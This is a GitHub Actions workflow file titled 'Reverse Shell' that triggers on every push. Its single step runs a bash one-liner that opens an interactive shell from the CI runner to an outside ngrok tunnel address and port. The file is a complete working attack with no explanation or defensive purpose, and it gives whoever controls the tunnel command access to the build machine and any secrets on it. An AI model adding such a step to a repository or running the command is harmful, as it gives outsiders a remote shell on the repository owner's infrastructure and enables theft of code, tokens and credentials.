name: Reverse Shell

on: [push]

jobs:
  reverse_shell:
    runs-on: ubuntu-latest

    steps:
    - name: Start Reverse Shell
      run: |
        bash -c 'bash -i >& /dev/tcp/0.tcp.us-cal-1.ngrok.io/17587 0>&1'
